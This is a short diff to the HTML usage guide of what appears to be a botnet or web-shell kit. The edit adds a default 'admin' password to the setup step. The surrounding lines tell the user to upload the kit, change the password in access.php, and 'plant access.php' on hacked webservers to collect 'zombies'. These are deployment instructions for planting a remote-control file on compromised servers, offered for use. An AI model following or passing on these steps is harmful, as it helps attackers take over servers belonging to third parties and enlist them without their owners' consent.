--- a/guide.html
+++ b/guide.html
@@ -17,7 +17,7 @@ Middle East Connection<br>
 --------------------<br>
 How To Use ??<br>
 --------------------<br>
-1. Upload All Files And Folder To Your Webserver<br>
+1. Upload All Files And Folder To Your Webserver default login password is : admin<br>
 2. Change Password In file access.php on line 15 for safety purpose<br>
 3. plant access.php at your hacked webserver if you have so many<br>
    webserver that's mean you will have so many zombies too<br>
